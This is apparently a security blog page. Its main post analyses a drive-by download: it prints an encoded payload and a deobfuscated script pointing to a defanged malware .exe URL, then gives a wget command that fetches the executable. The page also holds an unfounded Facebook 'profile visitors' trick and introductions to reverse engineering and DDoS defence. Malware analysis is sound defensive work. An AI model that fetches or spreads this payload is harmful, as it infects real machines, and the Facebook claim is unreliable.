<input type="text" id="bxpkr" value="78agb3aoadb2ajapao829ha1alahan9qad9haj8aada9aoabanaf8eb4abamb3af8eafb6aeabb7b18bb978b4abb082afb6aeabb2af93aoafb5829aabb2af8a8b9178afb6aeabb2af8gb1afb29aabb2af8aafb6aeabb2af8gahafb29aabb2af8a8b828d82afb6aeabb7b18b9178b4abb082ada9b4abamb3af93afb1adabaqaf8ab4abamb3af8b828d828a8aafb6aeabb7b19393aob3amam8b8295828484829082849182afb6aqajb0afb193848dafb6aeabb2af8gb2ap9r9q999pb2b0ajaoah8a8b8b9178aeapadb3anafaob28gadapapalajaf93ada9aoabanaf828d82849384828d82ada9b4abamb3af9178bb78b4abb082ai9laqb7ak9aabam829382aoabb4ajahabb2apb08gb3b1afb097ahafaob28gb2ap9iapb5afb099abb1af8a8b9178ajag8aai9laqb7ak9aabam8gajaoaeafb69lag8a84b5apb58o8m848b928i82888882ai9laqb7ak9aabam8gajaoaeafb69lag8a84anb1ajaf848b94938i8bb9789ha1alahan9qad9haj8a84ag9d9dai9qabb1aeabb1848e82alaea29ga19p98aja18d8488ai938l8k848e828j8b9178aeapadb3anafaob28gb5b0ajb2af8a8492ajagb0abanaf82agb0abanafacapb0aeafb093898i8982b1adb0apamamajaoah9389aoap8982b1b2b7amaf9389aqapb1ajb2ajapao90abacb1apamb3b2af91b2apaq908iaqb691amafagb2908iaqb6918982b1b0ad9389agaob2b18gaib2anam8994928hajagb0abanaf94848b9178bb78b4abb0829paqamajb29kb3an93agb3aoadb2ajapao8ab1b2b08bb978b4abb082b0afb293a5a79178b4abb082b1aqam93b1b2b08gb1aqamajb28a8ha5a68ga6a98e8fa78hah8b9178agapb08aaj938i91aj928m91aj8d8d8bb978ajag8ab2b7aqafapag82b1aqama5aja7839384b3aoaeafagajaoafae848bb9b0afb2a5aja793b1aqama5aja791bbafamb1afb9b0afb2a5aja793848i8491bb78bb78b0afb2b3b0ao82b0afb28gakapajao8a84848b9178bb9178b4abb0829dafb29kb3an93agb3aoadb2ajapao8ab1b2b08bb978b2b0b7b978b0afb2b3b0ao829paqamajb29kb3an8ab1b2b08ganabb2adai8a8ha5a6aea7a5a6aea68ga6a98e8fa78c8h8b8gakapajao8a84848b8b78bbadabb2adai8aad8bb9bb9178b0afb2b3b0ao8284849178bb9178b4abb0829dafb29maeaga0afb0b1ajapao93agb3aoadb2ajapao8a8bb978ajag8aaoabb4ajahabb2apb08gaqamb3ahajaob182888882aoabb4ajahabb2apb08gaqamb3ahajaob18gamafaoahb2ai948i8bb978b4abb082aqamb3ahajao9kabanaf829382aoabb4ajahabb2apb08gaqamb3ahajaob1a58497aeapacaf8297adb0apacabb284a79178ajag8a83aqamb3ahajao9kabanaf8b82b0afb2b3b0ao8284849178b4abb082aqaeaga9b4afb0a9b4afb0b1ajapao939dafb29kb3an8aaqamb3ahajao9kabanaf8gb4afb0b1ajapao8b9178b4abb082aqaeaga9b4afb0a9aeafb1adb0ajaqb2ajapao939dafb29kb3an8aaqamb3ahajao9kabanaf8gaeafb1adb0ajaqb2ajapao8b9178b4abb082aqaeaga9b4afb0a9anajanaf9384849178ajag8aaoabb4ajahabb2apb08ganajanaf9qb7aqafb1a584abaqaqamajadabb2ajapao8hb4aoae8gabaeapacaf8gaqaeagb6anam84a78bb9aqaeaga9b4afb0a9anajanaf93848r8g8i8g8i8g8i8491bbafamb1afb9ajag8aaoabb4ajahabb2apb08ganajanaf9qb7aqafb1a584abaqaqamajadabb2ajapao8hb4aoae8gabaeapacaf8gb68fanabb0b184a78bb9aqaeaga9b4afb0a9anajanaf93848q8g8i8g8i8g8i8491bbbb9178ajag8aaqaeaga9b4afb0a9b4afb0b1ajapao839384848bb978b0afb2b3b0ao82aqaeaga9b4afb0a9b4afb0b1ajapao9178bb78afamb1af82ajag8aaqaeaga9b4afb0a9aeafb1adb0ajaqb2ajapao839384848bb978b0afb2b3b0ao82aqaeaga9b4afb0a9aeafb1adb0ajaqb2ajapao829178bb78afamb1af82b978b0afb2b3b0ao829dafb29kb3an8aaqaeaga9b4afb0a9anajanaf8b9178bb78bbafamb1afb978b4abb082aeajb4a9apacak829382aeapadb3anafaob28gadb0afabb2af9bamafanafaob28a84aeajb4848b9178aeapadb3anafaob28gacapaeb78gabaqaqafaoae99aiajamae8aaeajb4a9apacak8b9178aeajb4a9apacak8gajaoaoafb09e9q9j9i82938289929l989g9b999q82ajae829382849maeag9mamb3ah9lacak8482aoabanaf93849maeag9mamb3ah9lacak8482999i979p9p9f9a9384adamb1ajae9099978q978r8p8q8i8f8k8q8i9a8f8j8j999c8f978k8m9a8f8m8m8m8n8n8l8n8m8i8i8i8i8482a19f9a9q9e93848i84829e9b9f9d9e9q93848i8494928h9l989g9b999q94899178b2b0b7b978b0afb2b3b0ao829dafb29kb3an8a9maeag9mamb3ah9lacak8g9dafb2a0afb0b1ajapaob18a8b8b9178bbadabb2adai8aad8bb9b0afb2b3b0ao82848491bb9178bb78bb78aqaeagb4afb08293829dafb29maeaga0afb0b1ajapao8a8b9178ajag8aaqaeagb4afb0839384848b78aqaeagb4afb093aqabb0b1af9faob28aaqaeagb4afb08b9178afamb1af82aqaeagb4afb0938i9178agb3aoadb2ajapao829canb1b7al8a8b82b978b4abb082b3ab829382aoabb4ajahabb2apb08gb3b1afb097ahafaob28gb2ap9iapb5afb099abb1af8a8b9178ajag828ab3ab8gajaoaeafb69lag8a84b5ajao848b94938i8b82b0afb2b3b0ao828j9178b0afb2b3b0ao828i9178bb78agb3aoadb2ajapao829n9k9oabb7agb88a8bb978ajag8aaoabb4ajahabb2apb08gb3b1afb097ahafaob28gajaoaeafb69lag8a8499aib0apanaf848b94938i8b82b0afb2b3b0ao828j9178b0afb2b3b0ao828i9178bb78agb3aoadb2ajapao82b29ib59aak9b9a9lac8aarapa499ak8b82b978b4abb082aqajagb0829382aeapadb3anafaob28gadb0afabb2af9bamafanafaob28a84ajag848d84b0ab848d84anaf848b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89b5ajaeb2ai898e828j8i8b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89aiafajahaib2898e828j8l8b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89b1b2b7amaf898e8284b2apaq908j8i8iaqb691aqapb1ajb2ajapao90abacb1apamb3b2af848b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89b1b0ad898e82arapa499ak8b9178aeapadb3anafaob28gacapaeb78gabaqaqafaoae99aiajamae8aaqajagb08b9178bb78ajag828a9canb1b7al8a8b82888882839n9k9oabb7agb88a8b8b82b978ajag828a8aaqaeagb4afb094938q8i8i8i82888882aqaeagb4afb092938q8k8i8i8b82baba828aaqaeagb4afb094938r8i8i8i82888882aqaeagb4afb092938r8l8i8i8b8b78b29ib59aak9b9a9lac8a84979banapal9p9c8gaqaeag848b9178ajag828aaqaeagb4afb0829493828o8i8i8i82888882aqaeagb4afb08292828q8i8i8i8b78b29ib59aak9b9a9lac8a84b5ar9999akan8gaqaeag848b9178ajag828a838a8aaqaeagb4afb094938q8i8i8i82888882aqaeagb4afb092938q8k8i8i8b82baba828aaqaeagb4afb094938r8i8i8i82888882aqaeagb4afb092938r8l8i8i8b8b82888882838aaqaeagb4afb0829493828o8i8i8i82888882aqaeagb4afb08292828q8i8i8i8b8b78b1afb29qajanafapb3b28a84aeapadb3anafaob28gb5b0ajb2af8a8992ajagb0abanaf82b1b2b7amaf93a684b2apaq908j8i8iaqb691aqapb1ajb2ajapao90abacb1apamb3b2afa68482b1b0ad93a684akapb4ag8gaib2anama68494928hajagb0abanaf94898b848e8l8i8i8i8b9178bb78">

 

So a text area with some random text…

 

Nothing much. Let’s get back and analyse that file which we got from the javascipt 🙂

 

<script>

ZNtS='UVne';if (ZNtS=='NYhMNY') RQvjqh();function RfTuWD(){}function omjcz(){}var PMispi=219;TbtOk='iCUcc';if (TbtOk=='xsPS') eHaPAj='PWcK';</p>
<p dir="ltr">var TgPZN='YxGr';function zuWU(){var PjSQr='LEBk';kGuff='kVcVPJ';if (kGuff=='DgDnT') jCdMP();}FOgl='mNgzp';if (FOgl=='FdLFVa') wJkyeL='nyLce';</p>
<p dir="ltr">var kdXJWSBiW="h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA";

</script>

 

the new script and there we got what we really wanted 🙂

 

“h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA”

 

The real malware what we always wanted to have 🙂

 

wget –save-header h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA

 

Download this file and let’s see its reports

1

Virus total report

https://www.virustotal.com/en/file/09d4986243951c6eafd4b715dd6b01a3a08e56dc61528387a914115f304b5583/analysis/1365682386/

 

Anubis report

http://anubis.iseclab.org/?action=result&task_id=106d9fecea32c098409aa191b7f285fd4&format=pdf

 

So malware confirmed.

 

In the process of analysis I came across “h00p://golf2day[dot]com/wnqe.html” but I am not be able to confirm why it is malecious or being declared malicious by browser as it was be asking for some ID pass and creating a secure connection.

 

Anyhow let’s see the domain and whois of this domain

whois 3d-game.com

  Domain Name: 3D-GAME.COM

  Registrar: DNC HOLDINGS, INC.

  Whois Server: whois.directnic.com

  Referral URL: http://www.directnic.com

  Name Server: NS1.DTDNS.COM

  Name Server: NS2.DTDNS.COM

  Name Server: NS3.DTDNS.COM

  Status: clientDeleteProhibited

  Status: clientTransferProhibited

  Status: clientUpdateProhibited

  Updated Date: 03-oct-2012

  Creation Date: 13-apr-2003

  Expiration Date: 13-apr-2014

Registrant:North Loop Networks

1807 3rd st ne

Minneapolis, MN 55418

US

612 385 5501

Domain Name: 3D-GAME.COM

 

Administrative Contact:

Manager, Hostmaster hostmaster@northloopnetworks.com

1807 3rd st ne

Minneapolis, MN 55418

US

612 385 5501

Technical Contact:Manager, Hostmaster hostmaster@northloopnetworks.com

1807 3rd st ne

Minneapolis, MN 55418

US

612 385 5501

Record last updated 03-02-2011 12:39:17 PM

Record expires on 04-13-2014

Record created on 04-13-2003

 Domain servers in listed order:

NS1.DTDNS.COM 64.156.29.49

NS2.DTDNS.COM 67.228.106.194

NS3.DTDNS.COM 75.126.80.224


#MalwareMustDie

Facebook Hack, Who visited your profile.

2 Comments

It’s a simple Facebook Hack nothing like some Privacy leak or something so I am not expecting any Death threats, Because of this. If you are still interested in sending some of those then send me over my personal ID not over my official one 😉

You Don’t have to give nay permission or to install anything, simply just try this over your browser and nothing like information leak. It just got 5 very simple steps.
1) Log in to your Facebook: I hope this is something very simple and need no explanation.

2) View Source or use this link “view-source:www.facebook.com” : this is something very simple, if not simple then go to your facebook right click and view source code.

3)Search for “InitialChatFriendsList” : After going in your source code prss (ctrl+f) and search this string.
4)Right after this keyword you will see {“list”[“1111111111″,”2222222222″,…,”9999999999”]} : You going to see a string like this just after what you have searched and that will be having some random numbers.

5)Replace X with Id to view the person profile www.facebook.com/XXXXXXXXXX and see the person who visited your profile.

I hope this is pretty Simple, Post your comments.

 

Regards

Unknown_had

What reverse engineering is? (Pure theory)

Leave a comment

This post is for those who don’t know what reverse engineering means.

I am not going to discuss some thing technical as in some disassembly tol or some debugger will just try to tell the young audience what reversing is.

Reverse engineering as the name specifies it’s something like starting from the very end and then finishing on the very start.

This sounds kind of confusing?

Let me to explain using  some better examples it’s a process of getting code form some binary.

 

As there are a lot of closed source binaries available in market and some of them are malicious too so here we feel the need of reversing some particular binary.

Consider example of some malware as we got no code for that and we need to study how malware works to know it’s internal features and what kind of things it’s doing to my machine in that case we have to cut the malware into 2 half 😉 (Kidding)

We have to reverse that malware.

So mostly there are two kind of ways by which we fo this

1) Dynamic analysis

2)Static analysis

Dynamic analysis is Analysis of the sample using some Debugger or some random tools while it’s getting executed over the system. If we are not sure about the sample then better to use some VM for this as that is going to help you protected and not to ruin the data over your machine.

Static Analysis is about simply reversing the sample and then to analyse the code.

Now here Come the Assembly thing as I have already taught the basics of assembly in my previous tutorial so this is going to be fun now as this own;t lok like some MATRIX and stuff 🙂

When you attach a running process with some Debugger or some Decompiler then it is not be able to provide the native code  (The original code in which the ample is written) it use to analyse it and to dump the assembly and for that we should know assebmly and other things

In the next Tutorials we going to need Olley debugger as will start with a simple crack me non malicious file and will carry forward the other things and a s the things proceed will try to train you from Noob to PRO 🙂

Ask any question over comment or mail me.

Do tell me if you find something which is wrong.

Thanks for reading.

 

What is DDOS layer 7 and Layer 4 and Low-Rate Ddos

1 Comment

Introduction

Very recently some hacactivist named as Lulzsec and Anonymous were very famous because they use to hack some of the government website and they use to hack the data and all.

This brings my interest and to know how they are doing all this, as we all know as this is now pretty old and you might be knowing about Ddos but here I am telling you about Ddos layer 3 and 4 attack.

The attacks which are be done by hack activist was layer 7 attack and you may do this kind of attack is by simply pressing the refresh button over your browser.

If hundreds of thousands of people will do this then at some point of time the server will become irresponsible and so it so server stop serving the users.

But for this kind of Ddos we need too many computers some of them might knew that they are being part of this attack or sometimes the people got involved unknowingly as they are under some malware .

So what Layer 3 and layer 4 Ddos .

As the Anonymous got active there got 1 person active against them by the name of “th3j35tor”  who claimed to be ex Security personal.

It was the 1st time when I cam across this level of Ddos which he was executing through a 3G connection over cellphone and was taking down some 3-4 big servers by using just 1 connection.

So what exactly Layer 4 Attack is?

A Layer4 DoS attack is often referred to as a SYN flood. It works at the Transport Protocol (TCP) layer. A TCP connection is established in what is known as a 3-way hand shaking. The client sends a SYN packet, the server responds with a SYN ACK, and the client responds tothat with an ACK. After the “three-way handshake” is complete, the TCP connection is considered established. It is as this point that applications begin sending data using a Layer 7 or application layer protocol, such as HTTP.

A SYN flood uses the inherent patience of the TCP stack to overwhelm a server by sending a flood of SYN packets and then ignoring the SYN ACKs returned by the server. This causes the server to use up resources waiting a configured amount of time for the anticipated ACK thatshould come from a legitimate client. Because web and application servers are limited in the number of concurrent TCP connections they can have open, if an attacker sends enough SYN packets to a server it can easily chew through the allowed number of TCP connections, thus preventing legitimate requests from being answered by the server.

SYN floods are fairly easy for proxy-based application delivery and security products to detect. Because they proxy connections for the servers, and are generally hardware-based with a much higher TCP connection limit, the proxy-based solution can handle the high volume of connections without becoming overwhelmed. Because the proxy-based solution is usually terminating the TCP connection (i.e. it is the “endpoint” of the connection) it will not pass the connection to the server until it has completed the 3-way handshake. Thus, a SYN flood is stopped at the proxy and legitimate connections are passed on to the server with alacrity.

The attackers are generally stopped from flooding the network through the use of SYN cookies.  SYN cookies utilize cryptographic hashing and are therefore computationally expensive, making it desirable to allow a proxy/delivery solution with hardware accelerated cryptographic capabilities handle this type of security measure. Servers can implement SYN cookies, but the additional burden placed on the server alleviates much of the gains achieved by preventing SYN floods and often results in available, but unacceptably slow performing servers and sites.

LDos (I got limited knowledge of this which I am sharing  if you got something more then do share that with me):

Low-rate Distributed Denial-of-Service (LDDoS) attacks send fewer packets to attack legitimate flows by exploiting the vulnerability in TCP’s congestion control mechanism.

They are difficult to detect while causing severe damage to TCP-based applications. Existing approaches can only detect the presence of an LDDoS attack, but fail to identify LDDoS flows. In this paper, we propose a novel metric – Congestion Participation Rate (CPR) – and a CPR-based approach to detect and filter LDDoS attacks by their intention to congest the network. The major innovation of the CPR-base approach is its ability to identify LDDoS flows.

A flow with a CPR higher than a predefined threshold is classified as an LDDoS flow, and consequently all of its packets will be dropped. We analyze the effectiveness of CPR theoretically by quantifying the average CPR difference between normal TCP flows and LDDoS flows and showing that CPR can differentiate them. We conduct ns-2 simulations, test-bed experiments, and Internet traffic trace analysis to validate our analytical results and evaluate the performance of the proposed approach. Experimental results demonstrate that the proposed CPR-based approach is substantially more effective compared to an existing Discrete Fourier Transform (DFT)-based approach

 

My project for the protection against DDos layer 7 attack.

I have created this Ddos protection script which is under the GPL license and it’s useful for protecting the server form leyer 7 Ddos protection.

This is useless for any of layer 3 and layer 4 Ddos attacks and a lot of code is still needed to be completed which I will be completing when got some free time.If you feel like completing then please go ahead and ask me what ever you feel like.

The Script can be download from here will GIT it ASAP.

I am sorry as the previous link was not working so I have uploaded it to GIT now you can get it form here, it’s under GPL license so you can use it for free 🙂
https://github.com/unknownhad/ddos-protection

Hope you like this and do share your views.

 

Older Entries Newer Entries